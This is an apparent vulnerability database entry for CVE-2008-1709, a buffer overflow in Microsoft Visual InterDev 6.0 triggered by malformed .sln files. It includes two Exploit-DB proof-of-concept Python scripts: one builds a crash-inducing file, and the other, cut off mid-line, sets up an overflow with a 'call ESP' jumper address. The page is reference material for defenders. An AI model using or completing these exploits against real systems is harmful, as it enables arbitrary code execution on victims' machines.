CVE-2008-1709
Published 2008-04-09
Priority: P345 · Severity: critical · CVSS 2.0 base score: 9.3
CVSS 2.0 vector: AV:N/AC:M/Au:N/C:C/I:C/A:C
Exploit: public PoC available (Exploit-DB entries below)
EPSS: 13.03% (95.9th percentile)
Buffer overflow in Microsoft Visual InterDev 6.0 (SP6) allows user-assisted attackers to execute arbitrary code via a Studio Solution (.SLN) file with a long malformed Project line beginning with a 'Project("{}") =' sequence, probably a different vector than CVE-2008-0250.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microsoft | visual_interdev | — | — |
No detection rules found.
Exploit-DB: Microsoft Visual InterDev 6.0 SP6 - '.sln' Local Buffer Overflow (PoC)
exploitdb · 2008-04-03

```python
# usage: exploit.py FileName
# PoC 2 (shinnai): writes a .sln file whose Project("{}") line carries an
# oversized project name. Crash-only; no payload is included.
import sys

print("--------------------------------------------------------------------------------")
print(' [PoC 2] Microsoft Visual InterDev 6.0 (SP6) ".sln" files Local Buffer Overflow')
print(" author: shinnai")
print(" mail: shinnai[at]autistici[dot]org")
print(" site: http://shinnai.altervista.org\n")
print(" Execution of arbitrary code is possible, but it annoys me at the moment :)")
print("--------------------------------------------------------------------------------")

# 264-byte filler, 4-byte marker, 256-byte tail
buff = "a" * 264 + "bbbb" + "c" * 256

try:
    sln_file = \
        'Microsoft Visual Studio Solution File, Format Version 1.00\n' + \
        'Project("{}") = "' + buff + '"\n' + \
        'EndProject\n'
    out_file = open(sys.argv[1] + ".sln", 'w')
    out_file.write(sln_file)
    out_file.close()
except Exception as e:
    print(e)
```
Exploit-DB: Microsoft Visual InterDev 6.0 SP6 - '.sln' Local Buffer Overflow
exploitdb · 2008-01-11

```python
# usage: exploit.py FileName
# Original PoC (shinnai); the indexed listing is truncated after "buff3 =".
import sys

print("------------------------------------------------------------------------")
print(' Microsoft Visual InterDev 6.0 (SP6) ".sln" files Local Buffer Overflow')
print(" author: shinnai")
print(" mail: shinnai[at]autistici[dot]org")
print(" site: http://shinnai.altervista.org\n")
print(" I really have much fun exploiting this one :)")
print(" We need to patch five exceptions before we can have EIP:\n")
print(" #7C80A268 8801 MOV BYTE PTR DS:[ECX],AL")
print(" #ECX 42424242 <-- to patch with jumper 0x7E3FBEFF")
print("------------------------------------------------------------------------")

buff = "A" * 1764
jumper = "\xFF\xBE\x3F\x7E"  # call ESP from user32.dll
buff2 = "A" * 4
buff3 =
```
No writeups or analysis indexed.
Published: 2008-04-09